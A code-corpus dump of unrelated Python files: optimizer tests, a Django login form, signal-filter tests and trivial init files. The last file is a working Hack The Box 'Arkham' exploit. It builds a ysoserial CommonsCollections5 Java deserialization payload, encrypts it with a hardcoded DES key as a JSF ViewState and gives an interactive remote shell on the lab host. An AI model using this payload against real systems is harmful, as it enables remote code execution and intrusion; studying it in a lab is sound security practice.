'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'constr': CConstraintL1(radius=100),
'bounds': CConstraintBox(lb=-2, ub=3)
}
self._test_minimize(
COptimizerPGDLS, 'quad-100-sparse',
opt_params=opt_params,
label='quad-100-sparse-discrete-bounded-l1',
out_int=True)
def test_minimize_poly_2d_bounded(self):
"""Test for COptimizer.minimize() method on a polynomial function in
a 2-dimensional space.
This function tests the optimization in discrete space, with an
integer eta, an integer starting point with a box constraint.
The solution expected by this test is an integer vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-1, ub=1)}
self._test_minimize(
COptimizerPGDLS, 'poly-2',
opt_params=opt_params,
label='poly-discrete-bounded',
out_int=True
)
def test_minimize_poly_100d_bounded(self):
"""Test for COptimizer.minimize() method on a polynomial function in
a 2-dimensional space.
This function tests the optimization in discrete space, with an
integer eta, an integer starting point with a box constraint.
The solution of this problem is an integer vector (of zeros).
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-1, ub=1)
}
self._test_minimize(
COptimizerPGDLS, 'poly-100-int',
opt_params=opt_params,
label='poly-int-discrete-bounded',
out_int=True)
def test_minimize_poly_100d_bounded_sparse(self):
"""Test for COptimizer.minimize() method on a polynomial function in
a 100-dimensional space.
This function tests the optimization in discrete space, with an
integer eta, an integer and sparse starting point (zeros vector)
with a box constraint.
The solution expected by this test is an integer sparse vector (of zeros).
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-1, ub=1)
}
self._test_minimize(
COptimizerPGDLS, 'poly-100-int-sparse',
opt_params=opt_params,
label='poly-int-sparse-discrete-bounded',
out_int=True)
if __name__ == '__main__':
COptimizerTestCases.main()
| 39.020942
| 82
| 0.600429
| 900
| 7,453
| 4.847778
| 0.114444
| 0.061884
| 0.037818
| 0.048132
| 0.872565
| 0.853083
| 0.82512
| 0.793262
| 0.793262
| 0.775155
| 0
| 0.028988
| 0.310345
| 7,453
| 190
| 83
| 39.226316
| 0.819844
| 0.378371
| 0
| 0.514563
| 0
| 0
| 0.125299
| 0.040249
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097087
| false
| 0
| 0.038835
| 0
| 0.145631
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ba6aa50f4379bf18bbf169b72be331ac588bd7fd
| 236
|
py
|
Python
|
accounts/forms.py
|
cgu-ist/ist3032019spring-project1
|
c4ee97e8a0766aee2fd6654c11b2b6759293e42e
|
[
"MIT"
] | null | null | null |
accounts/forms.py
|
cgu-ist/ist3032019spring-project1
|
c4ee97e8a0766aee2fd6654c11b2b6759293e42e
|
[
"MIT"
] | 1
|
2021-03-19T22:49:44.000Z
|
2021-03-19T22:49:44.000Z
|
accounts/forms.py
|
cgu-ist/ist3032019spring-project1
|
c4ee97e8a0766aee2fd6654c11b2b6759293e42e
|
[
"MIT"
] | null | null | null |
from django import forms
class LoginForm(forms.Form):
username = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control'}))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'form-control'}))
| 33.714286
| 91
| 0.737288
| 28
| 236
| 6.214286
| 0.535714
| 0.16092
| 0.229885
| 0.287356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 236
| 6
| 92
| 39.333333
| 0.820755
| 0
| 0
| 0
| 0
| 0
| 0.144068
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.25
| 0.25
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
240f9ea4ef8f740bd50af7dc369608a9c9955aee
| 2,281
|
py
|
Python
|
tests/test_filters_dct2d.py
|
wavestoweather/enstools
|
d0f612b0187b0ad54dfbbb78aa678564f46eaedf
|
[
"Apache-2.0"
] | 5
|
2021-12-16T14:08:00.000Z
|
2022-03-02T14:08:10.000Z
|
tests/test_filters_dct2d.py
|
wavestoweather/enstools
|
d0f612b0187b0ad54dfbbb78aa678564f46eaedf
|
[
"Apache-2.0"
] | null | null | null |
tests/test_filters_dct2d.py
|
wavestoweather/enstools
|
d0f612b0187b0ad54dfbbb78aa678564f46eaedf
|
[
"Apache-2.0"
] | null | null | null |
from enstools.misc import generate_coordinates
from enstools.filters import dct_2d_regional
import xarray as xr
import numpy as np
import pytest
@pytest.fixture
def low_freq_data():
"""
generate low frequency test data.
"""
lon, lat = generate_coordinates(0.5, lon_range=[-20, 20], lat_range=[-10, 10])
low_freq, _ = np.meshgrid(
np.sin(np.linspace(-1 * np.pi, 1 * np.pi, len(lon))),
np.zeros(40)
)
data = xr.DataArray(low_freq, coords=[lat, lon], dims=('lat', 'lon'), name="Test")
return data
@pytest.fixture
def high_freq_data():
"""
generate low frequency test data.
"""
lon, lat = generate_coordinates(0.5, lon_range=[-20, 20], lat_range=[-10, 10])
high_freq, _ = np.meshgrid(
np.sin(np.linspace(-10 * np.pi, 10 * np.pi, len(lon))),
np.zeros(40)
)
data = xr.DataArray(high_freq, coords=[lat, lon], dims=('lat', 'lon'), name="Test")
return data
def test_filters_dct2d_regional_low_pass(high_freq_data, low_freq_data):
"""
filter out the high frequency wave
"""
# don't look at the edges. small deviations are expected.
# high frequencies should be reduced
filtered_low = dct_2d_regional(high_freq_data, high_freq_data['lon'], high_freq_data['lat'], low_cutoff=2000)
np.testing.assert_array_less(filtered_low[:, 2:-2], 0.2)
# low frequencies should not be changed significantly
filtered_low = dct_2d_regional(low_freq_data, low_freq_data['lon'], low_freq_data['lat'], low_cutoff=2000)
np.testing.assert_array_less(np.abs(filtered_low - low_freq_data)[:, 2:-2], 0.2)
def test_filters_dct2d_regional_high_pass(high_freq_data, low_freq_data):
"""
filter out the low frequency wave
"""
# don't look at the edges. small deviations are expected.
# low frequencies should be reduced
filtered_high = dct_2d_regional(low_freq_data, low_freq_data['lon'], low_freq_data['lat'], high_cutoff=2000)
np.testing.assert_array_less(filtered_high[:, 2:-2], 0.2)
# high frequencies should not be changed significantly
filtered_high = dct_2d_regional(high_freq_data, high_freq_data['lon'], high_freq_data['lat'], high_cutoff=2000)
np.testing.assert_array_less(np.abs(filtered_high - high_freq_data)[:, 2:-2], 0.2)
| 36.790323
| 115
| 0.694871
| 353
| 2,281
| 4.226629
| 0.212465
| 0.107239
| 0.073727
| 0.040214
| 0.835121
| 0.743968
| 0.727882
| 0.621984
| 0.61126
| 0.61126
| 0
| 0.036605
| 0.173608
| 2,281
| 61
| 116
| 37.393443
| 0.754907
| 0.185445
| 0
| 0.242424
| 1
| 0
| 0.024554
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 1
| 0.121212
| false
| 0.060606
| 0.151515
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
241471c56dd30670fdd2c6fe1062b334ba0445f7
| 44
|
py
|
Python
|
bokchoy/conductors/dummy/__init__.py
|
ulule/bokchoy
|
58afaf325ce275edf5c4a955379afb1cc5eb5de3
|
[
"MIT"
] | null | null | null |
bokchoy/conductors/dummy/__init__.py
|
ulule/bokchoy
|
58afaf325ce275edf5c4a955379afb1cc5eb5de3
|
[
"MIT"
] | null | null | null |
bokchoy/conductors/dummy/__init__.py
|
ulule/bokchoy
|
58afaf325ce275edf5c4a955379afb1cc5eb5de3
|
[
"MIT"
] | null | null | null |
from .backend import DummyConductor # noqa
| 22
| 43
| 0.795455
| 5
| 44
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 44
| 1
| 44
| 44
| 0.945946
| 0.090909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
241a0dec6a26cd821fec2afd99516530823e121c
| 36
|
py
|
Python
|
petra_viewer/convertor/__init__.py
|
yamedvedya/data_viewer
|
c6238b71edcf0178ebe8ab8f9bf6e56e41cd4916
|
[
"MIT"
] | null | null | null |
petra_viewer/convertor/__init__.py
|
yamedvedya/data_viewer
|
c6238b71edcf0178ebe8ab8f9bf6e56e41cd4916
|
[
"MIT"
] | null | null | null |
petra_viewer/convertor/__init__.py
|
yamedvedya/data_viewer
|
c6238b71edcf0178ebe8ab8f9bf6e56e41cd4916
|
[
"MIT"
] | null | null | null |
# Created by matveyev at 29.04.2021
| 18
| 35
| 0.75
| 7
| 36
| 3.857143
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 0.166667
| 36
| 1
| 36
| 36
| 0.633333
| 0.916667
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2450909c3ca27bb6a7c97ae2ec07ef3a0b43c3e9
| 117
|
py
|
Python
|
Waveforms/results/JijklCMS.py
|
keefemitman/PostNewtonian
|
853d6577cb0002da5eebe1cb55f0c28fbc114324
|
[
"MIT"
] | 18
|
2015-03-26T01:04:36.000Z
|
2022-02-01T19:26:21.000Z
|
Waveforms/results/JijklCMS.py
|
keefemitman/PostNewtonian
|
853d6577cb0002da5eebe1cb55f0c28fbc114324
|
[
"MIT"
] | 4
|
2015-01-08T23:46:29.000Z
|
2017-09-20T19:13:51.000Z
|
Waveforms/results/JijklCMS.py
|
keefemitman/PostNewtonian
|
853d6577cb0002da5eebe1cb55f0c28fbc114324
|
[
"MIT"
] | 3
|
2016-05-13T02:36:14.000Z
|
2021-11-23T21:36:32.000Z
|
( ( ( nu*(15*nu/2 - 5/2)*r(t)**3/c )*nHat*nHat*nHat*SigmaVec )
+( ( -5*delta*nu*r(t)**3/(2*c) )*nHat*nHat*nHat*S ) )
| 58.5
| 62
| 0.504274
| 26
| 117
| 2.269231
| 0.461538
| 0.542373
| 0.101695
| 0.440678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087379
| 0.119658
| 117
| 2
| 63
| 58.5
| 0.485437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
301bf3a4e93afb65d25cd333eed70e768dbca517
| 29
|
py
|
Python
|
accounts/models/__init__.py
|
UserGraund/main_application
|
a814daf816858c94035191e01adae0a6b4d0bb42
|
[
"MIT"
] | 3
|
2020-02-16T10:49:01.000Z
|
2021-09-22T19:16:27.000Z
|
facebookHandler/__init__.py
|
ahmed-tounsi/facebook-handler
|
e00f656775920fc9c082532c789318f3740c9607
|
[
"MIT"
] | null | null | null |
facebookHandler/__init__.py
|
ahmed-tounsi/facebook-handler
|
e00f656775920fc9c082532c789318f3740c9607
|
[
"MIT"
] | 1
|
2021-02-16T19:27:14.000Z
|
2021-02-16T19:27:14.000Z
|
from .account import Account
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
30373fa6206bc869e7a9d68f87e6aafda378bf46
| 10,803
|
py
|
Python
|
Machines/Arkham/exploit.py
|
uwacsp/IppSec-Code
|
29a1ea6a93bc01b3700373d48caa5a79a3916a73
|
[
"CNRI-Python"
] | null | null | null |
Machines/Arkham/exploit.py
|
uwacsp/IppSec-Code
|
29a1ea6a93bc01b3700373d48caa5a79a3916a73
|
[
"CNRI-Python"
] | null | null | null |
Machines/Arkham/exploit.py
|
uwacsp/IppSec-Code
|
29a1ea6a93bc01b3700373d48caa5a79a3916a73
|
[
"CNRI-Python"
] | 1
|
2021-07-27T12:56:03.000Z
|
2021-07-27T12:56:03.000Z
|
#
# From Ippsec YouTube video of HTB Arkham
#
# https://youtu.be/krC5j1Ab44I
#
from base64 import b64decode, b64encode
from hashlib import sha1
import pyDes, hmac
import requests
from cmd import Cmd
URL = "http://10.10.10.130:8080/userSubscribe.faces"
# Adding Cmd to get terminal functionality
class Terminal(Cmd):
def __init__(self):
self.prompt = '> '
Cmd.__init__(self)
def default(self, args):
exploit(args)
def create_payload(cmd):
# payload from ysoserial https://github.com/frohoff/ysoserial
# java -jar /opt/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 'cmd /c ping -n 1 10.10.14.27' > payload.bin
payload = b""
payload += b'\xac\xed\x00\x05\x73\x72\x00\x2e\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x42\x61\x64\x41\x74'
payload += b'\x74\x72\x69\x62\x75\x74\x65\x56\x61\x6c\x75\x65\x45\x78\x70\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd4\xe7\xda\xab\x63\x2d'
payload += b'\x46\x40\x02\x00\x01\x4c\x00\x03\x76\x61\x6c\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63'
payload += b'\x74\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a'
payload += b'\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5'
payload += b'\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e'
payload += b'\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x74\x00'
payload += b'\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61'
payload += b'\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65'
payload += b'\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00'
payload += b'\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x08\x70\x75\x72\x00\x1e\x5b'
payload += b'\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02'
payload += b'\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x03\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e'
payload += b'\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x08\x42\x00'
payload += b'\x06\x66\x6f\x72\x6d\x61\x74\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0f\x63\x6c\x61\x73\x73\x4c\x6f'
payload += b'\x61\x64\x65\x72\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73'
payload += b'\x71\x00\x7e\x00\x05\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64'
payload += b'\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x6d\x6f\x64\x75\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0d'
payload += b'\x6d\x6f\x64\x75\x6c\x65\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x01\x00\x00\x00\x51\x74\x00\x03\x61\x70'
payload += b'\x70\x74\x00\x26\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2e\x70\x61\x79\x6c\x6f\x61\x64\x73\x2e\x43\x6f\x6d\x6d\x6f\x6e\x73'
payload += b'\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x35\x74\x00\x18\x43\x6f\x6d\x6d\x6f\x6e\x73\x43\x6f\x6c\x6c\x65\x63\x74\x69'
payload += b'\x6f\x6e\x73\x35\x2e\x6a\x61\x76\x61\x74\x00\x09\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x70\x70\x73\x71\x00\x7e\x00\x0b\x01'
payload += b'\x00\x00\x00\x33\x71\x00\x7e\x00\x0d\x71\x00\x7e\x00\x0e\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00\x10\x70\x70\x73\x71\x00\x7e'
payload += b'\x00\x0b\x01\x00\x00\x00\x22\x71\x00\x7e\x00\x0d\x74\x00\x19\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2e\x47\x65\x6e\x65\x72'
payload += b'\x61\x74\x65\x50\x61\x79\x6c\x6f\x61\x64\x74\x00\x14\x47\x65\x6e\x65\x72\x61\x74\x65\x50\x61\x79\x6c\x6f\x61\x64\x2e\x6a'
payload += b'\x61\x76\x61\x74\x00\x04\x6d\x61\x69\x6e\x70\x70\x73\x72\x00\x1f\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c'
payload += b'\x65\x63\x74\x69\x6f\x6e\x73\x24\x45\x6d\x70\x74\x79\x4c\x69\x73\x74\x7a\xb8\x17\xb4\x3c\xa7\x9e\xde\x02\x00\x00\x78\x70'
payload += b'\x78\x73\x72\x00\x34\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63'
payload += b'\x74\x69\x6f\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79\x8a\xad\xd2'
payload += b'\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c\x00\x03\x6b\x65\x79\x71\x00\x7e\x00\x01\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c\x6a'
payload += b'\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x78\x70\x74\x00\x03\x66\x6f\x6f\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61'
payload += b'\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e'
payload += b'\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00'
payload += b'\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f'
payload += b'\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68'
payload += b'\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73'
payload += b'\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01'
payload += b'\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68'
payload += b'\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72'
payload += b'\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73'
payload += b'\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8'
payload += b'\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d'
payload += b'\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73'
payload += b'\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69'
payload += b'\x43\x6f\x6e\x73\x74\x61\x6e\x74\x71\x00\x7e\x00\x01\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52'
payload += b'\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61'
payload += b'\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f'
payload += b'\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02'
payload += b'\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63'
payload += b'\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d'
payload += b'\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72'
payload += b'\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02'
payload += b'\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76'
payload += b'\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00'
payload += b'\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61'
payload += b'\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00'
payload += b'\x2f\x73\x71\x00\x7e\x00\x28\x75\x71\x00\x7e\x00\x2c\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x2c\x00\x00\x00\x00\x74\x00'
payload += b'\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67'
payload += b'\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x2c\x73\x71\x00\x7e'
payload += b'\x00\x28\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9'
payload += b'\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00'
payload += (chr(len(cmd))).encode()
payload += cmd.encode()
payload += b'\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x2f\x00\x00\x00\x01'
payload += b'\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x24\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67'
payload += b'\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e'
payload += b'\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72'
payload += b'\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02'
payload += b'\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00'
payload += b'\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78'
return encrypt_payload(payload)
def encrypt_payload(payload):
key = b64decode("SnNGOTg3Ni0=")
obj = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
enc = obj.encrypt(payload)
hash_val = (hmac.new(key, bytes(enc), sha1).digest())
payload = enc + hash_val
return b64encode(payload)
def decrypt_view_state(view_state):
key = b64decode("SnNGOTg3Ni0=")
obj = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
view_state = b64decode(view_state)
dec = obj.decrypt(view_state)
return dec
def exploit(cmd):
view_state = create_payload(cmd)
data = {"javax.faces.ViewState": view_state }
r = requests.post(URL, data=data)
terminal = Terminal()
terminal.cmdloop()
| 78.854015
| 138
| 0.700454
| 2,337
| 10,803
| 3.227642
| 0.111254
| 0.07318
| 0.047726
| 0.041363
| 0.569137
| 0.496487
| 0.4477
| 0.409784
| 0.392417
| 0.326793
